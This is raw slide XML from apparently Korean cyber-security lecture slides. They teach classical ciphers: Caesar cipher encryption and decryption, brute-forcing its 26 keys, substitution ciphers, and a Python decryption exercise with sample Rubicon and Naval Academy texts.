                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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a:t>복호화</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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a:t>HELLO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> KHOOR   ( key : 3 )</a:t>
            </a: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a:t>평문으로 사용되는 알파벳을 일정한 문자 수 만큼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>고전암호 실습 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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카이사르 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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30620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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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188479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a:t>부분에 암호문을 복사 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>붙혀넣기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>한후</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>엔터를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 친다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Intro</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>비대면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 수업</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a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>사이버전 실습실</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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a:t>Victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>VM</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>VM</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>C&amp;C server</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>Victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>VM</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>&lt;WSL2 docker&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>&lt;Host OS&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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all of the corps in Gaul and appear in Rome, he led the corps to cross the Rubicon River. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>At the time, the Rubicon River was the border between Rome and the provinces, and it was not allowed to cross the river with troops. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Caesar said his dice were thrown as he crossed this river.</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a:t>원로원의 최종권고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>즉 갈리아 땅 에서 군단을 모두 해체하고 로마에 출두하라는 원로원의 명령을 받고 고민 끝에 군단을 이끌고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>루비콘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 강을 도하하였다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>당시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>루비콘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 강은 로마와 속주의 경계였으며 군대를 이끌고 이 강을 넘을 수 없도록 정해져 있었다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>카이사르는 이 강을 건너면서 주사위는 던져졌다고 말했다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>고전암호 크래킹 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>카이사르 암호 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>1</a:t>
            </a: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key=3</a:t>
            </a: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언어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카이사르 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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404632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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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882353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“cipher.txt”, “decryption.py” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일 생성</a:t>
            </a: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a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2. “cipher.txt” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에 암호문 복사</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“decryption.py.py” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>기초 작성</a:t>
            </a:r>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“decryption.py.py” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>작성</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decryption.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>실행</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="100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Along with liberation, the Naval Academy was opened to foster elite naval officers who will protect the seas of the motherland by Admiral Son Won-il and other marine pioneers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>The elite guardianships produced by the Naval Academy have dedicated themselves to their motherland, and are still striving to raise the status of Korea in all parts of the world.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Like the adage that those who rule the sea dominate the world, we will meet the expectations of the nation and the people by nurturing talented people who protect the sea, which is our place of living and the channel of national prosperity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>We look forward to your continued interest and support for our Naval Academy. Thank you.</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a:t>해군사관학교는 해방과 함께 손원일 제독을 비롯한 해양 선각자들이 조국의 바다를 수호할 정예 해군장교를 양성하고자 개교했습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>그동안 해군사관학교가 배출한 정예 호국간성들은 조국을 위해 헌신하였으며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>지금도 세계 각지에서 대한민국의 위상 제고를 위해 노력하고 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>바다를 지배하는 자가 세계를 지배한다는 격언처럼 우리의 생활 터전이자 국가번영의 통로인 바다를 지키는 우수한 인재를 양성하여 국가와 국민의 기대에 부응하겠습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>앞으로도 우리 해군사관학교에 대한 지속적인 관심과 성원을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>당부드립니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>감사합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Theory/T4/Ceasar </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>카이사르 암호의 크랙</a:t>
            </a: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a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>키가 주어지지 않았다면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>=&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>키의 종류는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>26</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>가지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>전사</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>(brute force attack) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격이 가능</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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J</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Q</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I</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F</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M</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M</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E</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L</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L</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O</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F</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C</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J</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J</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M</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U</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M</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J</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Q</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Q</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L</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I</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451697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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>고전암호 크래킹 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>카이사르 암호 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>2</a:t>
            </a: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언어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카이사르 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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284888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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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585180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all of the corps in Gaul and appear in Rome, he led the corps to cross the Rubicon River. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>At the time, the Rubicon River was the border between Rome and the provinces, and it was not allowed to cross the river with troops. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Caesar said his dice were thrown as he crossed this river.</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a:t>원로원의 최종권고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>즉 갈리아 땅 에서 군단을 모두 해체하고 로마에 출두하라는 원로원의 명령을 받고 고민 끝에 군단을 이끌고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>루비콘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 강을 도하하였다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>당시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>루비콘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 강은 로마와 속주의 경계였으며 군대를 이끌고 이 강을 넘을 수 없도록 정해져 있었다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>카이사르는 이 강을 건너면서 주사위는 던져졌다고 말했다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Theory/T4/Substitution</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>치환 암호</a:t>
            </a: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a:t>암호화</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>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a:t>HELLO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> TXGGO</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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err="1"/>
              <a:t>시저</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 암호보다 키의 종류가 훨씬 많다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. -&gt; 26! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>개</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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76013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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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정보보호</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국방 사이버 보안</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문화부</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t>정보보호반</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/Theory/T4/Substitution</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>치환 암호의 크랙</a:t>
            </a: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a:t>ME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
